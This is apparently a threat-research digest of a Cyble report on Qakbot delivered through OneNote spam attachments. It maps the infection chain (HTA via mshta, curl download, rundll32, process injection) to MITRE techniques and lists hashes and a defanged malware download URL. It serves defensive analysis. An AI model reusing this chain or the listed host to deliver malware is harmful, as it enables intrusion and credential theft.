Threat Research

Cyble – Qakbot’s Evolution Continues With New Strategies

Securonix

Threat actors are increasingly using OneNote attachments in spam campaigns to deliver Qakbot and other malware families. The infection chain drops an HTA loader via mshta, downloads a Qakbot DLL, and then executes it, enabling credential theft and lateral movement. #Qakbot #OneNote #Formbook #RedlineStealer #Asyncrat

Keypoints

  • The campaign targets users with spam emails containing OneNote attachments from multiple malware families (Formbook, Redline Stealer, Asyncrat, and Qakbot).
  • Initial infection begins with a OneNote attachment; opening it leads to a dropped .hta file executed by mshta.exe.
  • The HTA contains JavaScript and VBScript that manipulate the registry and obfuscated data to stage the payload.
  • An embedded JavaScript/anonymous function downloads a Qakbot DLL via curl and stores it as a local file (121.png) before execution with rundll32.
  • Qakbot then injects into wermgr.exe to steal credentials (browsers, emails) and can spread to other devices for further malware deployment.
  • Cyble emphasizes Qakbot as a evolving threat and provides defensive recommendations to reduce risk (phishing awareness, AV, MFA, DLP, etc.).

MITRE Techniques

  • [T1566.001] Phishing – The initial infection starts with a spam email containing a OneNote attachment. “The initial infection starts with a spam email containing a OneNote attachment.”
  • [T1218.005] Mshta – The OneNote delivery drops an embedded .hta file executed by mshta.exe. “embedded .hta file executed by mstha.exe”
  • [T1059.007] JavaScript – The HTA file contains two JavaScript and two VBscript and performs the following operations when executed. “The .hta file contains two JavaScript and two VBscript and performs the following operations when executed.”
  • [T1059.005] Visual Basic – The HTA file contains two JavaScript and two VBscript and performs the following operations when executed. “The .hta file contains two JavaScript and two VBscript and performs the following operations when executed.”
  • [T1112] Modify Registry – VBScript creates a registry value under HKEY_CURRENT_USERSoftwareFirmSoft and writes the obfuscated content. “creates an in-string value “Name” under the registry key HKEY_CURRENT_USERSOFTWAREFirmSoft and writes the obfuscated content stored in the previous step.”
  • [T1027] Obfuscated/Compressed Files and Information – The code reads obfuscated content and reconstructs a function. “The anonymous function now creates an in-string value under the registry and reads the obfuscated content from the registry and creates an anonymous function by using replace method.”
  • [T1105] Ingress Tool Transfer – The payload is downloaded from a remote server via curl and saved locally. “downloads “19825.dat” file from the remote server and saves to %Programdata% location as “121.png”.”
  • [T1218.011] Rundll32 – The downloaded DLL is executed using rundll32.exe. “Qakbot DLL file that will be executed using “rundll32.exe” by JavaScript.”
  • [T1055] Process Injection – The DLL injects into wermger.exe to perform stealing activities. “injects malicious code into “wermger.exe” to perform stealing activities.”
  • [T1555.003] Credentials in Web Browsers – Qakbot can steal usernames, passwords, and cookies from browsers. “Qakbot can steal sensitive information such as usernames, passwords, and cookies from browsers…”
  • [T1021] Lateral Movement – The malware can spread to other devices within the network to deploy other malware families. “It can spread to other devices within the network to deploy other malware families.”
  • [T1071.001] Web Protocols – C2/Beacons use HTTP to fetch payloads. “beacon on the network level to block data exfiltration by malware or TAs.”

Indicators of Compromise

  • [SHA256] Email Attachment (Eml) – b53bc20c9191f83e511c617ec7b8a5e05d5b77be5a1e44276f8cae761010d7d7
  • [SHA256] OneNote File – f18f10f9b74b987bf98d163bdfb7b619dcb7b39b3349ae3ccdcc5f348d6e0c75
  • [SHA256] HTA File – 7a51e7dec2080d22fea9edd2757b68687a7ba8c4dd1ba83ea7e68dc73539134b
  • [SHA256] Qakbot DLL – 26b4c1b52c357b6c876c28ccbe95b86f93767142c050952c92cd774cc7dd8d37
  • [URL] Download URL – hxxp://77[.]75[.]230[.]128/19825[.]dat
  • [Filename] Payload names – 121.png, 19825.dat

Read more: https://blog.cyble.com/2023/02/01/qakbots-evolution-continues-with-new-strategies/